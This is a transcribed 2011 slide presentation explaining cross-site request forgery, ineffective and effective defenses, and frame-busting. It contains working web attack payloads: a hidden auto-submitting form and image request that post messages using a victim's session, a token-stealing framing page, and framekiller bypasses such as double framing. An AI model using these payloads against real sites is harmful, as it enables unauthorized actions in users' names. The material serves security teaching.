CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011

Cross-Site Request Forgery (CSRF in short) is a kind of a web application vulnerability which allows malicious website to send unauthorized requests to a vulnerable website using active session of its authorized users.



  1. CROSS-SITE REQUEST FORGERY
     In-depth analysis 2011
     Copyright 2012 © CYBER GATES
     Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License
  2. Cross-Site Request Forgery
     The OWASP Top 10 Web Application Security Risks 2010
     A1: Injection
     A2: Cross-Site Scripting (XSS)
     A3: Broken Authentication and Session Management
     A4: Insecure Direct Object References
     A5: Cross-Site Request Forgery (CSRF)
     A6: Security Misconfiguration
     A7: Insecure Cryptographic Storage
     A8: Failure to Restrict URL Access
     A9: Insufficient Transport Layer Protection
     A10: Unvalidated Redirects and Forwards
     Cross-Site Request Forgery  CYBER GATES  Page 2
  3. Cross-Site Request Forgery
     Description
       Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the active session of one of its authorized users.
     Example
       <img src="http://twitter.com/home?status=evil.com" style="display:none"/>
  4. Cross-Site Request Forgery
     Example
       <div style="display:none">
         <iframe name="hiddenFrame"></iframe>
         <!-- the victim's browser attaches its site.com session cookie to this POST -->
         <form name="Form" action="http://site.com/post.php" target="hiddenFrame" method="POST">
           <input type="text" name="message" value="I like www.evil.com" />
           <input type="submit" />
         </form>
         <script>document.Form.submit();</script>
       </div>
  5. Cross-Site Request Forgery
     Useless defenses
     Only accept POST
       This stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created with frames, scripts, etc.
     Referrer checking
       Some users prohibit referrers, so you can't just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
     Requiring multi-step transactions
       A CSRF attack can perform each step in order.
  6. Cross-Site Request Forgery
     Solutions
     CAPTCHA systems
       A type of challenge-response test used in computing to ensure that the response is not generated by a computer.
     One-time tokens
       Unlike CAPTCHA systems, this is a unique number stored both in a web form field and in the session, so the two can be compared after the form submission.
  7. Cross-Site Request Forgery & One-time tokens
     Bypassing one-time tokens
       <html>
       <head>
       <title>BAD.COM</title>
       <script language="javascript">
       function submitForm() {
         // tries to read the token out of the framed good.com document
         var token = window.frames[0].document.forms["messageForm"].elements["token"].value;
         var myForm = document.myForm;
         myForm.token.value = token;
         myForm.submit();
       }
       </script>
       </head>
       <body onLoad="submitForm();">
       <div style="display:none">
         <iframe src="http://good.com/index.php"></iframe>
         <form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
           <input type="text" name="message" value="I like www.bad.com" />
           <input type="hidden" name="token" value="" />
           <input type="submit" value="Post">
         </form>
       </div>
       </body>
       </html>
     Same origin policy
       The read from the frame fails, because good.com and bad.com are different origins:
       Permission denied to access property document
  8. Cross-Site Request Forgery & FrameKillers
     Description
       FrameKillers are small pieces of JavaScript code used to protect web pages from being framed.
     Example
       if (top.location != location) { top.location = self.location; }
  9. Cross-Site Request Forgery & FrameKillers
     Conditional statement
       - if (top != self)
       - if (top.location != self.location)
       - if (top.location != location)
       - if (parent.frames.length > 0)
       - if (window != top)
       - if (window.top !== window.self)
       - if (window.self != window.top)
       - if (parent && parent != window)
       - if (parent && parent.frames && parent.frames.length > 0)
  10. Cross-Site Request Forgery & FrameKillers
      Counter-action statement
        - top.location = self.location
        - top.location.href = document.location.href
        - top.location.replace(self.location)
        - top.location.href = window.location.href
        - top.location.replace(document.location)
        - top.location.href = "URL"
        - document.write()
        - top.location.replace(URL)
        - top.location.replace(window.location.href)
        - top.location.href = location.href
        - self.parent.location = document.location
        - parent.location.href = self.document.location
  11. Cross-Site Request Forgery & FrameKiller killers
      FrameKiller killers
      Double framing
        <iframe src="second.html"></iframe>
        second.html:
        <iframe src="http://www.site.com"></iframe>
      Using the onBeforeUnload event
        <script>
        window.onbeforeunload = function() {
          return "do you want to leave this page?";
        }
        </script>
        <iframe src="http://www.site.com"></iframe>
  12. Cross-Site Request Forgery & Best Practices
      FrameKiller
        <style>
        html { display: none; }
        </style>
        <script>
        if (self == top) {
          // not framed: reveal the page
          document.documentElement.style.display = "block";
        } else {
          // framed: break out to the top-level window
          top.location = self.location;
        }
        </script>
      Note: this protects the web application even if an attacker has the web page loaded with JavaScript disabled in the browser, because the page stays hidden until the script confirms it is not framed.
  13. Cross-Site Request Forgery
      References
        - Cross-Site Request Forgery
          http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
          http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
        - Same Origin Policy
          http://en.wikipedia.org/wiki/Same_origin_policy
        - FrameKiller (Frame Busting)
          http://en.wikipedia.org/wiki/Framekiller
          http://seclab.stanford.edu/websec/framebusting/framebust.pdf
  14. CYBER GATES
      Contacts
        - Corporate website: www.cybergates.am
        - Company profile on Twitter: www.twitter.com/CyberGatesLLC
        - Company fan page on Facebook: www.facebook.com/Cyber.Gates.page
        - Company profile on LinkedIn: www.linkedin.com/company/CyberGates-LLC
        - Company channel on Vimeo: www.vimeo.com/CyberGates
        - Company channel on YouTube: www.youtube.com/TheCyberGates
  15. "Be one step ahead in Security." www.cybergates.am
